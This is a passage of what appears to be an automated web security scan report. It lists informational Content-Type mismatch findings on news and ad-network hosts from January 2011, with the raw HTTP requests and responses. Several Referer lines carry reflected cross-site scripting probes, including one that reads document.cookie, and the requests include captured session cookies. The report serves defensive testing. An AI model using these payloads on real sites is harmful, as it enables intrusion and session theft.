Confidence:	Firm
Host:	http://common.onset.freedom.com
Path:	/fi/adsense/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28.11. http://common.onset.freedom.com/fi/analytics/cms/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://common.onset.freedom.com
Path:	/fi/analytics/cms/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28.12. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F'%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert(0x00241B)%253C%2Fscript%253E&uid=7hSy8PbjRnOXSf2i_40364845&xy=104%2C60&wh=1155%2C1012&vchannel=bzo.847.CD39C435!&cid=5196052&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

28.13. http://events.cbs6albany.com/images/zbutton.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://events.cbs6albany.com
Path:	/images/zbutton.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/zbutton.gif HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; Zvents=fnr9vfxsab

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 28 Jan 2011 17:37:24 GMT
Content-Type: image/gif
Content-Length: 635
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sat, 29 Jan 2011 17:37:24 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

.PNG
.
...IHDR..............W.?...2PLTE..............l..C........n.............................
........)..-..............D..............
..$.....;...........U.....7..B....................F..t..~...
...[SNIP]...

28.14. http://events.cbs6albany.com/json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://events.cbs6albany.com
Path:	/json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /json?jsonsp=Zvents_load_ZventsWidget1&limit=5&p=150&sid=jblyxxj3qv HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; s_vnum=1298828234584%26vn%3D1; __qca=P0-387650238-1296236241942; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; s_cc=true; s_lastvisit=1296308278321; fi_dslv=Less%20than%201%20day; s_vnum_w=1296367200803%26vn%3D2; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D2; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:38:52 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 22
ETag: "6ada5d9026de97b7a69a76e9d5289da1"
X-Content-Digest: 1bf9b03ed1a98a41bde540df89f91f024aea5cd7
Cache-Control: max-age=1800, public
Age: 0
Content-Length: 16813

Zvents_load_ZventsWidget1('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Pink Floyd Experience","price":"$25.00 - $30.00","private":false,"editors_pick":false,"url":"http://www.palaceal
...[SNIP]...

28.15. http://hpi.rotator.hadj7.adjuggler.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:44:07 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /favicon.ico not found</pre>
<BR>

28.16. http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://main.oggifinogi.com
Path:	/OggiPlayerService/PlayerProxy.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /OggiPlayerService/PlayerProxy.aspx?id=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&vary=&getLoader=true HTTP/1.1
Host: main.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-From-Cache: True
Cache-Control: public
Last-Modified: Wed, 17 Nov 2010 19:11:59 GMT
ETag: MjAxMC0xMS0xNyAxOToxMTo1OQ==
Vary: *
Content-Type: application/x-javascript
Content-Length: 12072

OggiResponse='\1\1<html xmlns="http://www.w3.org/1999/xhtml">\1<head id="PlayerHead"><title>\1 Player\1</title>\1 <style type="text/css">\1 .hand {cursor:pointer}\1 </style>\1 <!--[if
...[SNIP]...

28.17. http://mig.nexac.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mig.nexac.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:28:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Wed, 13 Oct 2010 18:42:29 GMT
ETag: "241cbf-1cee-f49acf40"
Accept-Ranges: bytes
Content-Length: 7406
Content-Type: text/plain

..............h...6... ..............00..........F...(....... ...........@.......................95..G<'.D:'.F<'.@9+......R...N...c...W...Z...G...Q...U..@}.......C...............T...J..Z...m...+t..t.
...[SNIP]...

Summary

Severity:	Information
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:59:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 761
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<script type="text/javascript">
var _bizo_ad_partner_id = "847";
var _bizo_ad_section_id = "ATF";
var _bizo_ad_width = "728";
var _bizo_ad_height = "90";
var _b
...[SNIP]...

28.19. http://oascentral.bostonherald.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://oascentral.bostonherald.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; __utmb=235728274.3.10.1296308367; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:42:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 23 Apr 2010 15:55:03 GMT
ETag: "7f095-1cee-734523c0"
Accept-Ranges: bytes
ntCoent-Length: 7406
Content-Type: text/plain
Cache-Control: private
Content-Length: 7406

..............h...6... ..............00..........F...(....... ...........@.......................95..G<'.D:'.F<'.@9+......R...N...c...W...Z...G...Q...U..@}.......C...............T...J..Z...m...+t..t.
...[SNIP]...

28.20. http://onset.freedom.com/fi/analytics/cms/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://onset.freedom.com
Path:	/fi/analytics/cms/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

28.21. http://raw.oggifinogi.com/Service.svc/OptOutCookiePresents previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://raw.oggifinogi.com
Path:	/Service.svc/OptOutCookiePresents

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /Service.svc/OptOutCookiePresents? HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://static-cdn-cf.oggifinogi.com/prod/RequestSender.swf?v=4&playlistId=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&site=www.bostonherald.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: application/json; charset=utf-8
Content-Length: 5

false

28.22. http://raw.oggifinogi.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://raw.oggifinogi.com
Path:	/crossdomain.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/xml

The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /crossdomain.xml HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://static-cdn-cf.oggifinogi.com/prod/RequestSender.swf?v=4&playlistId=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&site=www.bostonherald.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 257
Content-Type: text/xml
Last-Modified: Fri, 12 Sep 2008 13:12:44 GMT
Accept-Ranges: bytes
ETag: "2ae33c3ed914c91:6ac"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 21:58:03 GMT

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
<allow-http-request-head
...[SNIP]...

28.23. http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://scores.heraldinteractive.com
Path:	/aspdata/clients/herald/game.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /aspdata/clients/herald/game.aspx?team=028 HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 28 Jan 2011 22:00:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=58
Expires: Fri, 28 Jan 2011 22:01:00 GMT
Last-Modified: Fri, 28 Jan 2011 22:00:00 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 3133

document.write('<TABLE border="0" cellspacing="1" cellpadding="2" width="100%"><TR><TH Class="TSN6" width="40%" align="left">Final</TH><TH Class="TSN2" align="center" width="5%">1</TH><TH Class="TSN2"
...[SNIP]...

28.24. http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://scores.heraldinteractive.com
Path:	/aspdata/clients/herald/nbagame.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /aspdata/clients/herald/nbagame.aspx?team=092 HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 28 Jan 2011 22:00:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1245

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><TR><TH width="40%" class="TSN6" align="left">1/28 10:30 PM ET</th><TH width="10%" class="TSN2" align="center">1</th><TH
...[SNIP]...

28.25. http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://scores.heraldinteractive.com
Path:	/aspdata/clients/herald/nflgame.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /aspdata/clients/herald/nflgame.aspx?team=077 HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 28 Jan 2011 22:00:01 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1814

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><tr><TH width="40%" class="TSN6" align="left">Final </th><TH width="10%" align="center" Class="TSN2">1</th><TH width="10%
...[SNIP]...

28.26. http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://scores.heraldinteractive.com
Path:	/aspdata/clients/herald/nhlgame.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /aspdata/clients/herald/nhlgame.aspx?team=121 HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 28 Jan 2011 22:00:01 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1659

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><tr><TH width="40%" class="TSN6" align="left">Final </th><TH width="10%" align="center" Class="TSN2">1</th><TH width="10%
...[SNIP]...

28.27. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

28.28. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

28.29. http://twitter.com/oexchange.xrd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://twitter.com
Path:	/oexchange.xrd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain XML.

Request

GET /oexchange.xrd HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:37 GMT
Server: hi
Status: 200 OK
Last-Modified: Fri, 28 Jan 2011 02:36:34 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 760
Cache-Control: max-age=86400
Expires: Sat, 29 Jan 2011 14:25:34 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<?xml version='1.0' encoding='UTF-8'?>
<XRD xmlns='http://docs.oasis-open.org/ns/xri/xrd-1.0'>
<Subject>http://twitter.com</Subject>
<Property type='http://www.oexchange.org/spec/0.8/prop/vendor'>
...[SNIP]...

28.30. http://www.berkshireeagle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.berkshireeagle.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: www.berkshireeagle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=NCGACERYMBIXOCUUCAWCFEY; UserID=NCGACERYMBIXOCUUCAWCFEY; fPage=true; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DNCGACERYMBIXOCUUCAWCFEY%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1296308397392%3BcVisit%3D1296308397392%3BinitRegType%3DVoluntary%3B; currBrandCheck=NeBer; UserType=Browser; s_cc=true; s_sq=%5B%5BB%5D%5D; __g_c=w%3A1%7Cb%3A2%7Cc%3A291148578685700%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=291148578685700_1_0.01_0_5_1296740401855; Zvents=x378593tx7; __qca=P0-1648436609-1296308432289

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 29 Jan 2011 13:40:51 GMT
Content-Length: 15
Connection: close
Vary: Accept-Encoding

File not found.

28.31. http://www.bostonherald.com/home/includes/twitter.inc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/home/includes/twitter.inc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /home/includes/twitter.inc HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 21:45:09 GMT
Accept-Ranges: bytes
Content-Length: 28395
Content-Type: text/plain; charset=UTF-8
Connection: close


<p><a class="twitter_name sec_entertainment" href="http://twitter.com/BosHerald_Edge/" target="_new">BosHerald_Edge</a>: A foodie calendar for Bostonians: a
...[SNIP]...

28.32. http://www.bostonherald.com/projects/boston_pensions/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/boston_pensions/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

